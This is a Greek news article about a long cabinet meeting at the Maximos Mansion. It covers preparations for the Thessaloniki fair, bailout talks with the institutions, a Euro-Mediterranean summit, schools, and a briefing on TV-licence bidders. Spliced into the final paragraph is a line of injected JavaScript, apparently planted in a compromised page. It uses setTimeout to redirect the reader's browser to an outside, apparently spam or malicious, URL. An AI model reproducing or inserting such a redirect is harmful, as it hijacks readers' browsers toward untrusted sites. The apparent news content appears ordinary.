Πέντε κρίσιμα ζητήματα στη μαραθώνια κυβερνητική σύσκεψη

0
4

 

Μαραθώνια κυβερνητική σύσκεψη πραγματοποιήθηκε στο Μαξίμου υπό τον πρωθυπουργό όπου συζητήθηκαν πέντε κρίσιμα ζητήματα.

Αρχικά, στο επίκεντρο βρέθηκε η προετοιμασία ενόψει της ΔΕΘ και οι εξαγγελίες του Αλέξη Τσίπρα. Κυβερνητικές πηγές, που επικαλείται το Αθηναϊκό Πρακτορείο, σημειώνουν ότι οι συσκέψεις αυτές και ενημερωτικές συναντήσεις θα συνεχιστούν και τις επόμενες ημέρες αλλά το κυβερνητικό επιτελείο δεν προτίθεται να προβεί σε ανακοινώσεις πριν από την παρουσία του πρωθυπουργού στη Θεσσαλονίκη.

Η κυβέρνηση έχει ήδη ανακοινώσει ότι στη ΔΕΘ θα παρουσιαστούν τα επόμενα βήματα προς την ανάκαμψη της οικονομίας και την πραγματική ανάπτυξη με δύο σταθμούς: την έξοδο από το πρόγραμμα επιτήρησης και την παραγωγική ανασυγκρότηση.

Κατά τη διάρκεια της σύσκεψης συζητήθηκε και η πορεία της διαπραγμάτευσης με τους θεσμούς. Κυβερνητικές πηγές υπογραμμίζουν ότι δεν υπάρχει καμία ανησυχία για την πορεία της υλοποίησης των προαπαιτουμένων για την εκταμίευση της υποδόσης που τοποθετείται χρονικά στο τέλος Σεπτεμβρίου, αρχές Οκτωβρίου. Το βάρος σημειώνουν ότι μεταφέρεται στη δεύτερη αξιολόγηση η οποία θα ξεκινήσει αμέσως μετά και θα συμπεριλαμβάνει και το ζήτημα του ελληνικού χρέους.

Θέμα συζήτησης ήταν και η επικείμενη ευρωμεσογειακή διάσκεψη στην οποία η κυβέρνηση αποδίδει μεγάλο βάρος για την ενίσχυση της συνεργασίας, με στόχο να εισέλθει η μεσογειακή οπτική στην ευρωπαϊκή ατζέντα για ένα νέο ευρωπαϊκό όραμα.

Η κυβέρνηση επιδιώκει η Ευρωμεσογειακή Διάσκεψη να αποτελέσει το πρώτο βήμα δραστικότερης παρέμβασης στην ευρωπαϊκή πολιτική, για την ανατροπή των ανισοτήτων μεταξύ περιφέρειας και κέντρου, καθώς και την ενίσχυση της κοινωνικής σύγκλισης και συνοχής αλλά και να υπάρξει συνεργασία στην προσφυγική κρίση.

Κατά τη διάρκεια της σύσκεψης συζητήθηκαν και τα θέματα της Παιδείας ενόψει της έναρξης της σχολικής χρονιάς με την πολιτική ηγεσία του υπουργείου Παιδείας να θέτει ψηλά τον πήχη για να μην υπάρχουν κενά στα σχολεία.

Επιπλέον, σύμφωνα με το Αθηναϊκό Πρακτορείο, υπήρξε και ενημέρωση από τον υπουργό Επικρατείας Νίκος Παππά για τις συναντήσεις που είχε χθες με τους προσωρινούς υπερθεματιστές. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here